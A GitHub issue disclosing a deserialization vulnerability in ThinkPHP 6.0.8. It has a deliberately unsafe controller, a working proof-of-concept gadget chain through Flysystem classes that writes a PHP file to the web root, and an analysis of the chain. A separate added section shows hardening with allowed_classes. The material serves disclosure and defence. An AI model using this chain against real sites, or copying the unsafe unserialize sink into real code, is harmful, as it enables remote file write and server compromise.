ThinkPHP6.0.8 exists unserialize vulnerability #2559
Closed

Y4tacker opened this issue Jul 2, 2021 · 1 comment
Y4tacker commented Jul 2, 2021

ThinkPHP 6.0.8 has an unserialize vulnerability.

Vulnerability Demo

Create a route at controller/Index.php:

```php
<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        // Untrusted POST data is passed straight to unserialize(): the sink.
        if (isset($_POST['data'])) {
            @unserialize($_POST['data']);
        }
    }
}
```

This is my PoC:

```php
<?php

// Minimal stand-ins for the Flysystem classes, carrying only the properties
// that the gadget chain described in the analysis below relies on.
namespace League\Flysystem\Cached\Storage {

    use League\Flysystem\Filesystem;

    abstract class AbstractCache
    {
        protected $autosave = false;
    }

    class Adapter extends AbstractCache
    {
        protected $adapter;
        protected $file;

        public function __construct()
        {
            $this->complete = "*/<?php phpinfo();?>";
            $this->expire = "yydsy4";
            $this->adapter = new \League\Flysystem\Adapter\Local();
            $this->file = "y4tacker.php";
        }
    }
}

namespace League\Flysystem\Adapter {
    class Local extends AbstractAdapter
    {
    }

    abstract class AbstractAdapter
    {
        protected $pathPrefix;

        public function __construct()
        {
            $this->pathPrefix = "./";
        }
    }
}

namespace {
    use League\Flysystem\Cached\Storage\Adapter;

    $a = new Adapter();
    echo urlencode(serialize($a));
}
```

The file has been generated in the public directory. (Two screenshots accompany this in the original issue.)

Vulnerability Analysis

First, it starts with __destruct; autosave can be bypassed by assigning a value of true.

Next we call the save method; because this is an abstract class, we need to find the method that implements it:

```php
abstract class AbstractCache implements CacheInterface
```

Here I choose vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php.

The adapter variable is controllable, and it feels like write may perform a write operation, so we search globally for the write method.

Finally, at vendor\league\flysystem\src\Adapter\Local.php:

The has method determines whether the value in the location variable is an existing file; in order to bypass it we need a non-existent file name, and the path is completely controllable.

And this one happens to have the file_put_contents method in it.

The value of contents comes from what we passed in earlier; we can see it is $this->getForStorage():

The parameters are all controllable, but we need to bypass the json_encode method; otherwise, if we pass in escape characters, they will also be output.

Here I pass in `*/<?php phpinfo();?>`: what comes before it is commented out and what follows `?>` is separated off, causing the vulnerability. The analysis is complete.

@Y4tacker Y4tacker closed this as completed Jul 2, 2021
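Added example (not from the issue author or ThinkPHP): the sink in the reported controller is `unserialize()` on raw POST data, and the chain only works because the attacker picks which class gets instantiated and so which `__destruct()` runs. The script below uses a constructed stand-in class (`DemoGadget`, hypothetical) to show the destructor firing through the vulnerable call and being neutralised by `allowed_classes => false`, then gives a hardened form of the issue's `Index::index()`.

```php
<?php
// Stand-in with a destructor, so the demo runs without the Flysystem classes.
class DemoGadget
{
    public static array $log = [];
    public string $file = 'demo.php';

    public function __destruct()
    {
        // In the real chain this is where AbstractCache::__destruct() calls save(),
        // which ends in file_put_contents(); here we only record that it fired.
        self::$log[] = "destructor ran for {$this->file}";
    }
}

$payload = serialize(new DemoGadget());   // the kind of string that arrives in $_POST['data']
DemoGadget::$log = [];                     // reset: the temporary above was already destroyed

// 1) Vulnerable sink, as in the issue: any autoloadable class is instantiated and its
//    __destruct() runs as soon as the result is discarded.
unserialize($payload);
$firedWithoutAllowList = count(DemoGadget::$log);   // 1

// 2) Hardened sink: with allowed_classes => false every object becomes
//    __PHP_Incomplete_Class, so no magic method of the original class can run.
DemoGadget::$log = [];
$obj = unserialize($payload, ['allowed_classes' => false]);
$firedWithAllowList = count(DemoGadget::$log);      // 0
$classSeen = get_class($obj);                       // "__PHP_Incomplete_Class"

// 3) Hardened controller for the issue's Index::index(). Prefer JSON for untrusted
//    input; if serialized data must be accepted, never let the client choose classes.
function index(): void
{
    if (!isset($_POST['data'])) {
        return;
    }
    $value = unserialize($_POST['data'], ['allowed_classes' => false]);
    // Reject anything that still carries an object, so an incomplete class object
    // cannot be re-serialized and handed to another sink later.
    if ($value instanceof __PHP_Incomplete_Class) {
        http_response_code(400);
        return;
    }
}

printf("without allow-list: %d, with allow-list: %d (%s)\n",
    $firedWithoutAllowList, $firedWithAllowList, $classSeen);
```

The same `allowed_classes` option also accepts an array of class names when a specific safe type must be restored; `false` is the right default for a sink fed by request data.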
@LittleJake

This vulnerability might only affect ThinkPHP 6.X?
